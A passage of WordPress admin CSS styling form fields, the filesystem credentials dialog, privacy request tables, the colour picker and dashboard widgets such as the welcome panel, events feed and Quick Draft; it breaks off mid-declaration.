textarea { max-width: 100%; } .form-field #site-address { max-width: 25em; } .form-field #domain { max-width: 22em; } .form-field #site-title, .form-field #admin-email, .form-field #path, .form-field #blog_registered, .form-field #blog_last_updated { max-width: 25em; } .form-field #path { margin-bottom: 5px; } #search-users, #search-sites { max-width: 60%; } .configuration-rules-label { font-weight: 600; margin-bottom: 4px; } /*------------------------------------------------------------------------------ Credentials check dialog for Install and Updates ------------------------------------------------------------------------------*/ .request-filesystem-credentials-dialog { display: none; /* The customizer uses visibility: hidden on the body for full-overlays. */ visibility: visible; } .request-filesystem-credentials-dialog .notification-dialog { top: 10%; max-height: 85%; } .request-filesystem-credentials-dialog-content { margin: 25px; } #request-filesystem-credentials-title { font-size: 1.3em; margin: 1em 0; } .request-filesystem-credentials-form legend { font-size: 1em; padding: 1.33em 0; font-weight: 600; } .request-filesystem-credentials-form input[type="text"], .request-filesystem-credentials-form input[type="password"] { display: block; } .request-filesystem-credentials-dialog input[type="text"], .request-filesystem-credentials-dialog input[type="password"] { width: 100%; } .request-filesystem-credentials-form .field-title { font-weight: 600; } .request-filesystem-credentials-dialog label[for="hostname"], .request-filesystem-credentials-dialog label[for="public_key"], .request-filesystem-credentials-dialog label[for="private_key"] { display: block; margin-bottom: 1em; } .request-filesystem-credentials-dialog .ftp-username, .request-filesystem-credentials-dialog .ftp-password { float: left; width: 48%; } .request-filesystem-credentials-dialog .ftp-password { margin-left: 4%; } .request-filesystem-credentials-dialog .request-filesystem-credentials-action-buttons { text-align: right; } .request-filesystem-credentials-dialog label[for="ftp"] { margin-right: 10px; } .request-filesystem-credentials-dialog #auth-keys-desc { margin-bottom: 0; } #request-filesystem-credentials-dialog .button:not(:last-child) { margin-right: 10px; } #request-filesystem-credentials-form .cancel-button { display: none; } #request-filesystem-credentials-dialog .cancel-button { display: inline; } .request-filesystem-credentials-dialog .ftp-username, .request-filesystem-credentials-dialog .ftp-password { float: none; width: auto; } .request-filesystem-credentials-dialog .ftp-username { margin-bottom: 1em; } .request-filesystem-credentials-dialog .ftp-password { margin: 0; } .request-filesystem-credentials-dialog .ftp-password em { color: #757575; } .request-filesystem-credentials-dialog label { display: block; line-height: 1.5; margin-bottom: 1em; } .request-filesystem-credentials-form legend { padding-bottom: 0; } .request-filesystem-credentials-form #ssh-keys legend { font-size: 1.3em; } .request-filesystem-credentials-form .notice { margin: 0 0 20px; clear: both; } /*------------------------------------------------------------------------------ Privacy Policy settings screen ------------------------------------------------------------------------------*/ .tools-privacy-policy-page form { margin-bottom: 1.3em; } .tools-privacy-policy-page input.button { margin: 0 1px 0 6px; } .tools-privacy-policy-page select { margin: 0 1px 0.5em 6px; } .tools-privacy-edit { margin: 1.5em 0; } .tools-privacy-policy-page span { line-height: 2; } .privacy_requests .column-email { width: 40%; } .privacy_requests .column-type { text-align: center; } .privacy_requests thead td:first-child, .privacy_requests tfoot td:first-child { border-left: 4px solid #fff; } .privacy_requests tbody th { border-left: 4px solid #fff; background: #fff; box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .privacy_requests .row-actions { color: #787c82; } .privacy_requests .row-actions.processing { position: static; } .privacy_requests tbody .has-request-results th { box-shadow: none; } .privacy_requests tbody .request-results th .notice { margin: 0 0 5px; } .privacy_requests tbody td { background: #fff; box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } .privacy_requests tbody .has-request-results td { box-shadow: none; } .privacy_requests .next_steps .button { word-wrap: break-word; white-space: normal; } .privacy_requests .status-request-confirmed th, .privacy_requests .status-request-confirmed td { background-color: #fff; border-left-color: #72aee6; } .privacy_requests .status-request-failed th, .privacy_requests .status-request-failed td { background-color: #f6f7f7; border-left-color: #d63638; } .privacy_requests .export_personal_data_failed a { vertical-align: baseline; } .status-label { font-weight: 600; } .status-label.status-request-pending { font-weight: 400; font-style: italic; color: #646970; } .status-label.status-request-failed { color: #d63638; font-weight: 600; } .privacy_requests .status-date { display: block; font-weight: 400; } .wp-privacy-request-form { clear: both; } .wp-privacy-request-form-field { margin: 1.5em 0; } .wp-privacy-request-form input { margin: 0; } /* =Media Queries -------------------------------------------------------------- */ @media screen and (max-width: 782px) { /* Input Elements */ textarea { -webkit-appearance: none; } input[type="text"], input[type="password"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="search"], input[type="tel"], input[type="time"], input[type="url"], input[type="week"] { -webkit-appearance: none; padding: 0 12px; min-height: 40px; } ::-webkit-datetime-edit { line-height: 1.875; /* 30px */ } input[type="checkbox"], .widefat th input[type="checkbox"], .widefat thead td input[type="checkbox"], .widefat tfoot td input[type="checkbox"] { -webkit-appearance: none; } .widefat th input[type="checkbox"], .widefat thead td input[type="checkbox"], .widefat tfoot td input[type="checkbox"] { margin-bottom: 8px; } input[type="checkbox"]:checked:before, .widefat th input[type="checkbox"]:before, .widefat thead td input[type="checkbox"]:before, .widefat tfoot td input[type="checkbox"]:before { width: 1.875rem; height: 1.875rem; margin: -0.1875rem -0.3125rem; } input[type="radio"], input[type="checkbox"] { height: 1.5625rem; width: 1.5625rem; } .wp-admin p input[type="checkbox"], .wp-admin p input[type="radio"] { margin-top: -0.1875rem; } input[type="radio"]:checked:before { vertical-align: middle; width: 0.5625rem; height: 0.5625rem; margin: 0.4375rem; line-height: 0.76190476; } .wp-core-ui select, .wp-admin .form-table select { min-height: 40px; font-size: 16px; line-height: 2.5; /* 40px for 16px font */ padding: 0 24px 0 12px; } .wp-admin .button-cancel { margin-bottom: 0; padding: 2px 0; font-size: 14px; vertical-align: middle; } #adduser .form-field input, #createuser .form-field input { width: 100%; } .form-table { box-sizing: border-box; } .form-table th, .form-table td, .label-responsive { display: block; width: auto; vertical-align: middle; } .label-responsive { margin: 0.5em 0; } .export-filters li { margin-bottom: 0; } .form-table .color-palette .color-palette-shade, .form-table .color-palette td { display: table-cell; width: 15px; height: 30px; padding: 0; } .form-table .color-palette { margin-right: 10px; } textarea, input { font-size: 16px; } .form-table td input[type="text"], .form-table td input[type="email"], .form-table td input[type="password"], .form-table td select, .form-table td textarea, .form-table span.description, #profile-page .form-table textarea { width: 100%; display: block; max-width: none; box-sizing: border-box; } .form-table .form-required.form-invalid td:after { float: right; margin: -30px 3px 0 0; } input[type="text"].small-text, input[type="search"].small-text, input[type="password"].small-text, input[type="number"].small-text, input[type="number"].small-text, .form-table input[type="text"].small-text { width: auto; max-width: 4.375em; /* 70px, enough for 4 digits to fit comfortably */ display: inline; padding: 3px 6px; margin: 0 3px; } .form-table .regular-text ~ input[type="text"].small-text { margin-top: 5px; } #pass-strength-result { width: 100%; box-sizing: border-box; padding: 8px; } .profile-php .wp-pwd .caps-warning { padding: 8px; } .password-input-wrapper { display: block; } .wp-core-ui .tablenav input[type="text"], .wp-core-ui .tablenav input[type="password"], .wp-core-ui .tablenav input[type="date"], .wp-core-ui .tablenav input[type="datetime"], .wp-core-ui .tablenav input[type="datetime-local"], .wp-core-ui .tablenav input[type="email"], .wp-core-ui .tablenav input[type="month"], .wp-core-ui .tablenav input[type="number"], .wp-core-ui .tablenav input[type="search"], .wp-core-ui .tablenav input[type="tel"], .wp-core-ui .tablenav input[type="time"], .wp-core-ui .tablenav input[type="url"], .wp-core-ui .tablenav input[type="week"], .wp-core-ui .tablenav select { min-height: 40px; } .wp-core-ui .tablenav .button { min-height: 40px; line-height: 2.71428571; padding: 0 14px; } p.search-box { float: none; width: 100%; margin-bottom: 20px; display: flex; } p.search-box input[name="s"] { width: 100%; float: none; margin-bottom: 10px; vertical-align: middle; } .js.plugins-php .search-box .wp-filter-search { width: 100%; margin-bottom: 0; } p.search-box input[type="search"], p.search-box input[type="text"] { min-height: 40px; padding: 0 12px; } p.search-box input[type="submit"].button { margin-bottom: 10px; } .form-table span.description { display: inline; padding: 4px 0 0; line-height: 1.4; font-size: 14px; } .form-table th { padding: 10px 0 0; border-bottom: 0; } .form-table td { margin-bottom: 0; padding: 4px 0 6px; } .form-table.permalink-structure td code { display: inline-block; } .form-table.permalink-structure .structure-selection { margin-top: 8px; } .form-table.permalink-structure .structure-selection .row > div { max-width: calc(100% - 36px); width: 100%; } .form-table.permalink-structure td input[type="text"] { margin-top: 4px; } .permalink-structure-has-blog-prefix { display: flex; align-items: center; } .form-table input.regular-text { width: 100%; } .form-table label { font-size: 14px; } .form-table td > label:first-child { display: inline-block; margin-top: 0.35em; } .background-position-control .button-group > label { font-size: 0; } .form-table fieldset label { display: block; } .form-field #domain { max-width: none; } /* New Password */ .wp-pwd { position: relative; } /* Needs higher specificity than normal input type text and password. */ #profile-page .form-table #pass1 { padding-right: 90px; } .wp-pwd button.button { background: transparent; border: 1px solid transparent; box-shadow: none; line-height: 2; margin: 0; padding: 5px 9px; position: absolute; right: 0; top: 0; width: 2.375rem; height: 2.375rem; min-width: 40px; min-height: 40px; } .wp-pwd button.wp-hide-pw { right: 2.5rem; } body.user-new-php .wp-pwd button.wp-hide-pw { right: 0; } .wp-pwd button.button:hover, .wp-pwd button.button:focus { background: transparent; } .wp-pwd button.button:active { background: transparent; box-shadow: none; transform: none; } .wp-pwd .button .text { display: none; } .wp-pwd [type="text"], .wp-pwd [type="password"] { line-height: 2; padding-right: 5rem; } body.user-new-php .wp-pwd [type="text"], body.user-new-php .wp-pwd [type="password"] { padding-right: 2.5rem; } .wp-cancel-pw .dashicons-no { display: inline-block; } .mailserver-pass-wrap .wp-pwd { display: block; } /* rtl:ignore */ #mailserver_pass { padding-left: 10px; } .options-general-php input[type="text"].small-text { max-width: 6.25em; margin: 0; min-height: 40px; } /* Privacy Policy settings screen */ .tools-privacy-policy-page form.wp-create-privacy-page { margin-bottom: 1em; } .tools-privacy-policy-page input#set-page, .tools-privacy-policy-page select { margin: 10px 0 0; } .tools-privacy-policy-page .wp-create-privacy-page span { display: block; margin-bottom: 1em; } .tools-privacy-policy-page .wp-create-privacy-page .button { margin-left: 0; } .wp-list-table.privacy_requests tr:not(.inline-edit-row):not(.no-items) td.column-primary:not(.check-column) { display: table-cell; } .wp-list-table.privacy_requests.widefat th input, .wp-list-table.privacy_requests.widefat thead td input { margin-left: 5px; } .wp-privacy-request-form-field input[type="text"] { width: 100%; margin-bottom: 10px; vertical-align: middle; } .regular-text { max-width: 100%; } } @media only screen and (max-width: 768px) { .form-field input[type="text"], .form-field input[type="email"], .form-field input[type="password"], .form-field select, .form-field textarea { width: 99%; } .form-wrap .form-field { padding: 0; } } @media only screen and (max-height: 480px), screen and (max-width: 450px) { /* Request Credentials / File Editor Warning */ .request-filesystem-credentials-dialog .notification-dialog, .file-editor-warning .notification-dialog { width: 100%; height: 100%; max-height: 100%; position: fixed; top: 0; margin: 0; left: 0; } } /* Smartphone */ @media screen and (max-width: 600px) { /* Color Picker Options */ .color-option { width: 49%; } } @media only screen and (max-width: 320px) { .options-general-php .date-time-text.date-time-custom-text { min-width: 0; margin-right: 0.5em; } } @keyframes rotation { 0% { transform: rotate(0deg); } 100% { transform: rotate(359deg); } } /*! This file is auto-generated */ .wp-color-picker{width:80px;direction:ltr}.wp-picker-container .hidden{display:none}.wp-picker-container .wp-color-result.button{min-height:32px;margin:0 0 6px 6px;padding:0 30px 0 0;font-size:11px}.wp-color-result-text{background:#f6f7f7;border-radius:2px 0 0 2px;border-right:1px solid #c3c4c7;color:#50575e;display:block;line-height:2.72727273;padding:0 6px;text-align:center}.wp-color-result:focus,.wp-color-result:hover{background:#f6f7f7;border-color:#8c8f94;color:#1d2327}.wp-color-result:focus:after,.wp-color-result:hover:after{color:#1d2327;border-color:#a7aaad;border-right:1px solid #8c8f94}.wp-picker-container{display:inline-block}.wp-color-result:focus{border-color:#4f94d4;box-shadow:0 0 3px rgba(34,113,177,.8)}.wp-color-result:active{transform:none!important}.wp-picker-open+.wp-picker-input-wrap{display:inline-block;vertical-align:top}.wp-picker-input-wrap label{display:inline-block;vertical-align:top}.form-table .wp-picker-input-wrap label{margin:0!important}.wp-customizer .wp-picker-input-wrap .button.wp-picker-clear,.wp-customizer .wp-picker-input-wrap .button.wp-picker-default,.wp-picker-input-wrap .button.wp-picker-clear,.wp-picker-input-wrap .button.wp-picker-default{margin-right:6px;padding:0 8px;line-height:2.72727273;min-height:32px}.wp-picker-container .iris-square-slider .ui-slider-handle:focus{background-color:#50575e}.wp-picker-container .iris-picker{border-radius:0;border-color:#dcdcde;margin-top:6px}.wp-picker-container input[type=text].wp-color-picker{width:4rem;font-size:12px;font-family:monospace;margin:0;padding:0 5px;vertical-align:top;min-height:32px}.wp-color-picker::-webkit-input-placeholder{color:#646970}.wp-color-picker::-moz-placeholder{color:#646970}.wp-picker-container input[type=text].iris-error{background-color:#fcf0f1;border-color:#d63638;color:#000}.iris-picker .iris-strip .ui-slider-handle:focus,.iris-picker .ui-square-handle:focus{border-color:var(--wp-admin-theme-color,#3858e9);border-style:solid;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.iris-picker .iris-palette:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9)}@media screen and (max-width:782px){.wp-picker-container input[type=text].wp-color-picker{width:5rem;font-size:16px;line-height:1.875;min-height:32px}.wp-customizer .wp-picker-container input[type=text].wp-color-picker{padding:0 5px}.wp-picker-input-wrap .button.wp-picker-clear,.wp-picker-input-wrap .button.wp-picker-default{padding:0 8px;line-height:2.14285714;min-height:32px}.wp-customizer .wp-picker-input-wrap .button.wp-picker-clear,.wp-customizer .wp-picker-input-wrap .button.wp-picker-default{padding:0 8px;font-size:14px;line-height:2.14285714;min-height:32px}.wp-picker-container .wp-color-result.button{padding:0 40px 0 0;font-size:14px;line-height:2.14285714}.wp-customizer .wp-picker-container .wp-color-result.button{font-size:14px;line-height:2.14285714}.wp-picker-container .wp-color-result-text{padding:0 14px;font-size:inherit;line-height:inherit}.wp-customizer .wp-picker-container .wp-color-result-text{padding:0 10px}}#wpbody-content #dashboard-widgets.columns-1 .postbox-container { width: 100%; } #wpbody-content #dashboard-widgets.columns-2 .postbox-container { width: 49.5%; } #wpbody-content #dashboard-widgets.columns-2 #postbox-container-2, #wpbody-content #dashboard-widgets.columns-2 #postbox-container-3, #wpbody-content #dashboard-widgets.columns-2 #postbox-container-4 { float: right; width: 50.5%; } #wpbody-content #dashboard-widgets.columns-3 .postbox-container { width: 33.5%; } #wpbody-content #dashboard-widgets.columns-3 #postbox-container-1 { width: 33%; } #wpbody-content #dashboard-widgets.columns-3 #postbox-container-3, #wpbody-content #dashboard-widgets.columns-3 #postbox-container-4 { float: right; } #wpbody-content #dashboard-widgets.columns-4 .postbox-container { width: 25%; } #dashboard-widgets .postbox-container { width: 25%; } #dashboard-widgets-wrap .columns-3 #postbox-container-4 .empty-container { border: none !important; } #dashboard-widgets-wrap { overflow: hidden; margin: 0 -8px; } #dashboard-widgets .postbox { border-radius: 8px; } #dashboard-widgets .postbox-header .hndle { padding: 12px 16px; } #dashboard-widgets .postbox .inside { margin-bottom: 0; } #dashboard-widgets .meta-box-sortables { display: flow-root; /* avoid margin collapsing between parent and first/last child elements */ /* Required min-height to make the jQuery UI Sortable drop zone work. */ min-height: 0; margin: 0 8px 20px; } #dashboard-widgets .meta-box-sortables:not(:empty) { margin-bottom: 16px; } #dashboard-widgets .postbox-container .empty-container { outline: 2px dashed rgb(0, 0, 0, 0.15); outline-offset: -2px; border-radius: 8px; height: 250px; margin: 4px; } /* Only highlight drop zones when dragging. */ .is-dragging-metaboxes #dashboard-widgets .meta-box-sortables { border-radius: 8px; background: rgb(var(--wp-admin-theme-color--rgb), 0.04); min-height: 100px; } .is-dragging-metaboxes #dashboard-widgets .postbox-container .empty-container { background: rgb(0, 0, 0, 0.01); } #dashboard-widgets .postbox-container .empty-container:after { content: attr(data-emptystring); margin: auto; position: absolute; top: 50%; left: 0; right: 0; transform: translateY( -50% ); padding: 0 2em; text-align: center; color: #646970; font-size: 16px; line-height: 1.5; display: none; } /* @todo: this was originally in this section, but likely belongs elsewhere */ #the-comment-list td.comment p.comment-author { margin-top: 0; margin-left: 0; } #the-comment-list p.comment-author img { float: left; margin-right: 8px; } #the-comment-list p.comment-author strong a { border: none; } #the-comment-list td { vertical-align: top; } #the-comment-list td.comment { word-wrap: break-word; } #the-comment-list td.comment img { max-width: 100%; } /* Screen meta exception for when the "Dashboard" heading is missing or located below the Welcome Panel. */ .index-php #screen-meta-links { margin: 0 20px 8px 0; } /* Welcome Panel */ .welcome-panel { position: relative; overflow: auto; margin: 16px 0; border-radius: 8px; font-size: 14px; line-height: 1.3; clear: both; } .welcome-panel h2 { margin: 0; font-size: 48px; font-weight: 600; line-height: 1.25; } .welcome-panel h3 { margin: 0; font-size: 20px; font-weight: 400; line-height: 1.4; } .welcome-panel p { font-size: inherit; line-height: inherit; } .welcome-panel-header { position: relative; color: #fff; } .welcome-panel-header-image { position: absolute !important; top: 0; right: 0; bottom: 0; left: 0; z-index: 0 !important; overflow: hidden; } .welcome-panel-header-image svg { display: block; margin: auto; width: 100%; height: 100%; } .rtl .welcome-panel-header-image svg { transform: scaleX(-1); } .welcome-panel-header * { color: inherit; position: relative; z-index: 1; } .welcome-panel-header a:focus, .welcome-panel-header a:hover { color: inherit; text-decoration: none; } .welcome-panel-header a:focus, .welcome-panel .welcome-panel-close:focus { outline-color: currentColor; outline-offset: 1px; box-shadow: none; } .welcome-panel-header p { margin: 0.5em 0 0; font-size: 20px; line-height: 1.4; } .welcome-panel .welcome-panel-close { display: flex; align-items: center; position: absolute; top: 10px; right: 10px; padding: 10px 15px; font-size: 13px; line-height: 1.23076923; /* Chrome rounding, needs to be 16px equivalent */ text-decoration: none; z-index: 1; /* Raise above the version image. */ } .welcome-panel .welcome-panel-close:before { transition: all .1s ease-in-out; content: '\f335'; font-size: 24px; color: #fff; } .welcome-panel .welcome-panel-close { color: #fff; } .welcome-panel .welcome-panel-close:hover, .welcome-panel .welcome-panel-close:focus, .welcome-panel .welcome-panel-close:hover::before, .welcome-panel .welcome-panel-close:focus::before { color: #fff972; } /* @deprecated 5.9.0 -- Button removed from panel. */ .wp-core-ui .welcome-panel .button.button-hero { margin: 15px 13px 3px 0; padding: 12px 36px; height: auto; line-height: 1.4285714; white-space: normal; } .welcome-panel-content { min-height: 400px; display: flex; flex-direction: column; justify-content: space-between; } .welcome-panel-header-wrap { background-color: #151515; } .welcome-panel-header { box-sizing: border-box; margin-left: auto; margin-right: auto; max-width: 1500px; width: 100%; padding: 48px 0 80px 48px; } .welcome-panel .welcome-panel-column-container { box-sizing: border-box; width: 100%; clear: both; display: grid; z-index: 1; padding: 24px; grid-template-columns: repeat(3, 1fr); gap: 32px; align-self: flex-end; background: #ffffff; border: 1px solid #c3c4c7; border-top: 0; border-radius: 0 0 8px 8px; } [class*="welcome-panel-icon"] { height: 60px; width: 60px; background-position: center; background-size: 24px 24px; background-repeat: no-repeat; border-radius: 100%; } .welcome-panel-column > svg { margin-top: 4px; } .welcome-panel-column { display: grid; grid-template-columns: min-content 1fr; gap: 24px; } .welcome-panel-icon-pages { background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E"); } .welcome-panel-icon-layout { background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E"); } .welcome-panel-icon-styles { background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E"); } /* @deprecated 5.9.0 -- Section removed from welcome panel. */ .welcome-panel .welcome-widgets-menus { line-height: 1.14285714; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column ul { margin: 0.8em 1em 1em 0; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel li { font-size: 14px; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel li a { text-decoration: none; } /* @deprecated 5.9.0 -- Lists removed from welcome panel. */ .welcome-panel .welcome-panel-column li { line-height: 1.14285714; list-style-type: none; padding: 0 0 8px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-icon { background: transparent !important; } /* Welcome Panel and Right Now common Icons style */ /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-icon:before, #dashboard_right_now li a:before, #dashboard_right_now li span:before, #dashboard_right_now .search-engines-info:before { color: #646970; font: normal 20px/1 dashicons; display: inline-block; padding: 0 10px 0 0; position: relative; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; vertical-align: top; } /* Welcome Panel specific Icons styles */ /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-write-blog:before, .welcome-panel .welcome-edit-page:before { content: "\f119"; content: "\f119" / ''; top: -3px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-add-page:before { content: "\f132"; content: "\f132" / ''; top: -1px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-setup-home:before { content: "\f102"; content: "\f102" / ''; top: -1px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-view-site:before { content: "\f115"; content: "\f115" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-widgets-menus:before { content: "\f116"; content: "\f116" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-widgets:before { content: "\f538"; content: "\f538" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-menus:before { content: "\f163"; content: "\f163" / ''; top: -2px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-comments:before { content: "\f117"; content: "\f117" / ''; top: -1px; } /* @deprecated 5.9.0 -- Icons removed from welcome panel. */ .welcome-panel .welcome-learn-more:before { content: "\f118"; content: "\f118" / ''; top: -1px; } /* Right Now specific Icons styles */ #dashboard_right_now .search-engines-info:before, #dashboard_right_now li a:before, #dashboard_right_now li > span:before { /* get only the first level span to exclude screen-reader-text in mu-storage */ padding: 0 5px 0 0; /* generic icon for items added by CPTs ? */ content: "\f159"; content: "\f159" / ''; } #dashboard_right_now .page-count a:before, #dashboard_right_now .page-count span:before { content: "\f105"; content: "\f105" / ''; } #dashboard_right_now .post-count a:before, #dashboard_right_now .post-count span:before { content: "\f109"; content: "\f109" / ''; } #dashboard_right_now .comment-count a:before { content: "\f101"; content: "\f101" / ''; } #dashboard_right_now .comment-mod-count a:before { content: "\f125"; content: "\f125" / ''; } #dashboard_right_now .storage-count a:before { content: "\f104"; content: "\f104" / ''; } #dashboard_right_now .storage-count.warning a:before { content: "\f153"; content: "\f153" / ''; } #dashboard_right_now .search-engines-info:before { content: "\f348"; content: "\f348" / ''; color: #d63638; } /* Dashboard WordPress events */ .community-events-errors { margin: 0; } .community-events-loading { padding: 10px 12px 8px; } .community-events { margin-bottom: 6px; padding: 0 12px; } .community-events .spinner { margin: 0 2px 0; } .community-events-errors[aria-hidden="true"], .community-events-errors [aria-hidden="true"], .community-events-loading[aria-hidden="true"], .community-events[aria-hidden="true"], .community-events form[aria-hidden="true"] { display: none; } .community-events .activity-block:first-child, .community-events h2 { padding-top: 12px; padding-bottom: 10px; } .community-events-form { margin: 15px 0 5px; display: flex; gap: 5px; align-items: center; flex-wrap: wrap; } .community-events-form .regular-text { width: 40%; margin: 0; min-height: 32px; padding: 0 8px; } #dashboard-widgets .community-events-form .button { min-height: 32px; line-height: 2.30769231; padding: 0 12px; } .community-events li.event-none { border-left: 4px solid var(--wp-admin-theme-color, #3858e9); } #dashboard-widgets .community-events li.event-none a { text-decoration: underline; } .community-events-form label { line-height: 2.14285714; } .community-events .activity-block > p { margin-bottom: 0; display: inline; } .community-events-toggle-location { vertical-align: middle; } /* Needs higher specificity than #dashboard-widgets .button-link */ #dashboard-widgets .community-events-cancel.button-link { text-decoration: underline; } .community-events ul { background-color: rgba(var(--wp-admin-theme-color--rgb),.08); padding-left: 0; padding-right: 0; padding-bottom: 0; } .community-events li { margin: 0; padding: 8px 12px; color: #2c3338; } .community-events li:first-child { border-top: 1px solid #e9e9ed; } .community-events li ~ li { border-top: 1px solid #e9e9ed; } .community-events .activity-block.last { border-bottom: 1px solid #e9e9ed; padding-top: 0; margin-top: -1px; } .community-events .event-info { display: block; } .community-events .ce-separator::before { content: "\2022"; content: "\2022" / ''; } .event-icon { height: 18px; padding-right: 10px; width: 18px; display: none; /* Hide on smaller screens */ } .event-icon:before { color: #646970; font-size: 18px; } .event-meetup .event-icon:before { content: "\f484"; content: "\f484" / ''; } .event-wordcamp .event-icon:before { content: "\f486"; content: "\f486" / ''; } .community-events .event-title { font-weight: 600; display: block; } .community-events .event-date, .community-events .event-time { display: block; } .community-events-footer { margin-top: 0; margin-bottom: 0; padding: 12px; border-top: 1px solid #f0f0f1; color: #646970; } /* Safari 10 + VoiceOver specific: without this, the hidden text gets read out before the link. */ .community-events-footer .screen-reader-text { height: inherit; white-space: nowrap; } /* Dashboard WordPress news */ #dashboard_primary .inside { margin: 0; padding: 0; } #dashboard_primary .widget-loading { padding: 12px 12px 0; margin-bottom: 1em !important; /* Needs to override `.postbox .inside > p:last-child` in common.css */ } /* Notice when JS is off. */ #dashboard_primary .inside .notice { margin: 0; } body #dashboard-widgets .postbox form .submit { margin: 0; } /* Used only for configurable widgets. */ .dashboard-widget-control-form p { margin-top: 0; } .rssSummary { color: #646970; margin-top: 4px; } #dashboard_primary .rss-widget { font-size: 13px; padding: 0 12px; } #dashboard_primary .rss-widget:last-child { border-bottom: none; padding-bottom: 8px; } #dashboard_primary .rss-widget a { font-weight: 400; } #dashboard_primary .rss-widget span, #dashboard_primary .rss-widget span.rss-date { color: #646970; } #dashboard_primary .rss-widget span.rss-date { margin-left: 12px; } #dashboard_primary .rss-widget ul li { padding: 4px 0; margin: 0; } /* Dashboard right now */ #dashboard_right_now ul { margin: 0; /* contain floats but don't use overflow: hidden */ display: inline-block; width: 100%; } #dashboard_right_now li { width: 50%; float: left; margin-bottom: 10px; } #dashboard_right_now .main p { margin: 0; } #dashboard_right_now #wp-version-message .button { float: right; position: relative; top: -5px; margin-left: 5px; } #dashboard_right_now p.search-engines-info { margin: 1em 0; } .mu-storage { overflow: hidden; } #dashboard-widgets h3.mu-storage { margin: 0 0 10px; padding: 0; font-size: 14px; font-weight: 400; } #network_dashboard_right_now p input { margin: 2px 1px; vertical-align: middle; } /* Dashboard right now - Colors */ #dashboard_right_now .sub { color: #50575e; background: #f6f7f7; border-top: 1px solid #f0f0f1; padding: 10px 12px 6px; } #dashboard_right_now .sub h3 { color: #50575e; } #dashboard_right_now .sub p { margin: 0 0 1em; } #dashboard_right_now .warning a:before, #dashboard_right_now .warning span:before { color: #d63638; } /* Dashboard Quick Draft */ #dashboard_quick_press .inside { margin: 0; padding: 0; } #dashboard_quick_press div.updated { margin-bottom: 10px; border: 1px solid #f0f0f1; border-width: 1px 1px 1px 0; } #dashboard_quick_press form { margin: 12px; } #dashboard_quick_press .drafts { padding: 10px 0 0; } /* Dashboard Quick Draft - Form styling */ #dashboard_quick_press label { display: inline-block; margin-bottom: 4px; } #dashboard_quick_press input, #dashboard_quick_press textarea { box-sizing: border-box; margin: 0; } #dashboard-widgets .postbox form .submit { margin: -39px 0; float: right; } #description-wrap { margin-top: 12px; } #quick-press textarea#content { min-height: 90px; max-height: 1300px; margin: 0 0 8px; padding: 8px 12px; resize: none; } /* Dashboard Quick Draft - Drafts list */ .js #dashboard_quick_press .drafts { border-top: 1px solid #f0f0f1; } #dashboard_quick_press .drafts abbr { border: none; } #dashboard_quick_press .drafts .view-all { float: right; margin: 0 12px 0 0; } #dashboard_primary a.rsswidget { font-weight: 400; } #dashboard_quick_press .drafts ul { margin: 0 12px; } #dashboard_quick_press .drafts li { margin-bottom: 1em; } #dashboard_quick_press .drafts li time { color: #646970; } #dashboard_quick_press .drafts p { margin: 0; word-wrap: break-word; } #dashboard_quick_press .draft-title { word-wrap: break-word; } #dashboard_quick_press .draft-title a, #dashboard_quick_press .draft-title time { margin: 0 5px 0 0; } /* Dashboard common styles */ #dashboard-widgets h4, /* Back-compat for pre-4.4 */ #dashboard-widgets h3, #dashboard_quick_press .drafts h2 { margin: 0 12px 8px; padding: 0; font-size: 14px; font-weight: 400; color: 